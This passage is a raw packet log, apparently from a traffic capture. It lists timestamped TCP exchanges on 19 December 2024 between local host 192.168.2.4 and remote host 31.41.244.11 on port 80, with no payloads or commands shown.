                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.693094015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.693141937 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.693145990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.693196058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.694078922 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.694138050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.694205999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.694267035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.695028067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.695095062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.695163012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.695220947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.696031094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.696094990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.696139097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.696197987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.696994066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.697052956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.697138071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.697195053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.697974920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.698036909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.698096991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.698153973 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.698930979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.698987007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.699052095 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.699105978 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.699899912 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.699956894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.699997902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.700048923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.700869083 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.700932026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.700964928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.701014996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.701838970 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.701896906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.701951027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.702011108 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.702814102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.702871084 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.702919006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.702976942 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.703828096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.703892946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.703917027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.703972101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.704770088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.704830885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.704878092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.704936028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.705764055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.705825090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.705884933 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.705940962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.706753969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.706809998 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.706856012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.706933975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.707705975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.707763910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.707820892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.707875967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.708647013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.708719015 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.708801031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.708858013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.709656000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.709706068 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.709810972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.709862947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.710632086 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.710694075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.710731030 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.710783958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.711683035 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.711756945 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.711827040 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.711899996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.712574959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.712635994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.712655067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.712702990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.713527918 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.713592052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.713670015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.713721991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.714504004 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.714562893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.714603901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.714659929 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.715467930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.715538025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.715656996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.715708017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.716434956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.716494083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.716562986 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.716617107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.717427015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.717487097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.717597008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.717650890 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.718401909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.718465090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.718523979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.718605042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.719352007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.719417095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.719485998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.719542980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.720340967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.720396996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.720448017 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.720504999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.721299887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.721363068 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.721396923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.721452951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.722294092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.722354889 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.722410917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.722496033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.723347902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.723408937 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.723495007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.723552942 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.724276066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.724330902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.724400043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.724458933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.725235939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.725294113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.725363016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.725409985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.726205111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.726269960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.726336002 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.726408005 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.727181911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.727250099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.727288008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.727350950 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.728141069 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.728202105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.728271961 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.728331089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.729110956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.729221106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.870243073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.870328903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.870412111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.870412111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.870650053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.870707989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.870826960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.870881081 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.871603966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.871659994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.871742964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.871799946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.872570038 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.872642040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.872680902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.872741938 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.873548985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.873625994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.873666048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.873739958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.874552011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.874610901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.874676943 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.874731064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.875490904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.875545979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.875616074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.875670910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.876442909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.876498938 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.876630068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.876683950 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.877424002 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.877480984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.877549887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.877604961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.878426075 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.878503084 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.878505945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.878562927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.879420042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.879478931 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.879560947 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.879614115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.880398989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.880496025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.880500078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.880549908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.881333113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.881385088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.881505013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.881558895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.882323980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.882380962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.882463932 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.882518053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.883270025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.883341074 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.883425951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.883481979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.884274960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.884330034 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.884399891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.884459972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.885221004 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.885276079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.885337114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.885390997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.886193037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.886253119 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.886286020 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.886351109 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.887180090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.887247086 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.887276888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.887353897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.888132095 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.888186932 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.888287067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.888346910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.889122009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.889178038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.889238119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.889292002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.890077114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.890146971 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.890202045 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.890255928 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.891056061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.891153097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.891185045 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.891247988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.892034054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.892091036 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.892174959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.892246962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.892996073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.893064976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.893140078 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.893198013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.894000053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.894076109 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.894134998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.894195080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.894967079 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.895030975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.895101070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.895174026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.895942926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.895993948 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.896059036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.896114111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.896956921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.897011995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.897073984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.897130966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.897866011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.897921085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.897927999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.897984028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.898848057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.898907900 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.898977041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.899033070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.899835110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.899884939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.899962902 CET804976331.41.244.11192.168.2.4
